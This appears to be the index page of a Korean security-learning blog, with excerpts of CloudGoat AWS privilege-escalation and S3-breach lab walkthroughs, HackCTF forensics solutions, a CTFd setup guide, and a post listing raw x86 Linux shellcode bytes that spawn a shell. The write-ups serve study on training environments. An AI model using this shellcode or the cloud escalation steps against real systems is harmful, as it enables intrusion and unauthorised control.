이것저것

    [CloudGoat] 4. iam_privesc_by_attachment

    # Start $ ./cloudgoat.py create iam_privesc_by_attachment [+] Start.txt [+] goal Delete the EC2 instance "cg-super-critical-security-server. "cg-super-critical-security-server"라는 EC2 instance를 삭제하는 것이 목표다! # Exploit Scenario Step1. configure + 사용자 권한 확인 $ aws configure --profile Kerrigan start.txt에 저장되어 있던 Access Key ID와 Secret Access Key를 사용한다. Default region name은 "us-east-1"로 넣어줬다. 이렇게 사용자를 등..

    [CloudGoat] 3. cloud_breach_s3

    # Start $ ./cloudgoat.py create cloud_breach_s3 $ cd c;pid+breach_s3_[] [+] start.txt 이번에는 aws_account)id와 target_ec2_server_ip 만 제공되었다. 전 단계만큼 쉽게 configure 하지는 못할 듯하다. [+] goal Download the confidential files from the S3 bucket. 이번 exploit 에서의 최종 목표도 앞에서와 조금 다르다. S3 버킷으로부터 비밀 정보(개인정보)를 다운받는 것이 목표다. [+] Cloud-native Breach 란? 우선 직역하자면, "클라우드 네이티브 침해"라고 한다. 공격자가 클라우드 사용자의 resource에 접근하고, 민감한 정보를 ..

    [CloudGoat] 2. lambda_privesc

    # Start ~/cloudgoat$ ./cloudgoat.py create lambda_privesc ~/cloudgoat$ cd lambda_privesc_[]/ [+] Information IAM User "Chris" 1 IAM User & 2 IAM Resources [+] goal 관리자의 전체 권한을 얻는 것이다. [+] start.txt # Exploit Scenario Step1. Configure ~/cloudgoat/lambda_privesc_cgid1rf4444iju$ aws configure --profile Chris Step2. Check policies ~/cloudgoat/lambda_privesc_cgid1rf4444iju$ aws iam get-user --profile..

    [HackCTF / Forensics] 세상에 잊혀진 날 찾아줘

    문제 파일(pdf)을 다운로드 받아 열어보면 아래와 같다. 이 pdf에서 어떻게 플래그를 찾아야할까 고민해보면서 확대 축소도 해보고 이것저것 눌러보기도 해봤다. 그러던 중 이미지 파일의 일부를 긁어보면 문자열이 복사되는 것을 알 수 있다.

    [HackCTF / Forensics] So easy?

    이번에도 문제파일을 다운받아 HxD 에 올려봤다. 바로 HackCTF{} 포맷을 찾을 수 있었다! 아래에 hidden.txt라는 문자열이 조금 거슬리지만.. 우선 플래그 값이 맞는지 넣어봤다. 역시.. 플래그가 아니다. (지금 다시보니,, 히 속았지롱 HxD에 올라온 값들을 잘 살펴보면 "PK"라는 파일 헤더 시그니쳐를 볼 수 있다..! (( 이 때 헤더 시그니쳐에 대한 지식이 있다면 훨씬 쉽게 접근할 수 있었을 것이다. )) (( http://forensic-proof.com/archives/300

    [HackCTF / Forensics] Question?

    문제 파일을 다운로드 받아본다. "Do_you_know_HxD" 라는 이름의 압축파일이 다운로드된다. 이름에서 추측해보건데, HxD에 바로 이 이미지 파일을 올리면 되지 않을까?! HxD에 바로 이미지 파일을 올리고 HackCTF의 플래그 포맷인 "Hack"을 검색해보면 따란 바로 플래그를 얻을 수 있다!

    [HackCTF / Forensics] Welcome_Forensics

    포렌식 문제도 재밌어보이길래 한 번 도전해봤다..! 문제 버튼을 클릭하면 이렇게 뭔가 깨진것처럼 반짝거리는 이미지가 보인다. 이 이미지를 마우스 오른쪽 버튼을 클릭해 [새 탭에서 이미지 열기]를 해보자! 짜잔! 이렇게 플래그를 얻을 수 있다 (╹ڡ╹ )

    [CloudGoat] 1. iam_privesc_by_rollback

    보호되어 있는 글입니다.

    [CTFd] CTFd 를 이용해서 CTF 사이트 만들기 -docker, docker compsoe 설치

    CTFd CTF 사이트를 제작할 수 있는 오픈 소스 프레임워크! 설치를 위해서는 ▷ 최소: dual core CPU + 1 GB RAM ▶ 권장: quad core CPU + 2GB RAM 내 기본환경: ubuntu 16.04 on VMwareWorkstation 1. docker 설치 docs.docker.com/get-docker/ Get Docker docs.docker.com 이 사이트에서 자신의 환경에 맞는 docker를 선택하면 된다. 이 중 Linux > Server 중 Ubuntu 를 선택했다. - docker 오래된 버전 제거하기 $ sudo apt-get remove docker docker-engine docker.io containerd runc 이후 docker를 설치하는 방법이 ..

    유용한 쉘 코드들

    \x31\xc0\xb0\x31\xcd\x80\x89\xc1\x89\xc3\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\ x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80 △ 41 byte 짜리 쉘 코드 \xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81 △ "\x2f"가 없는 쉘 코드 (47..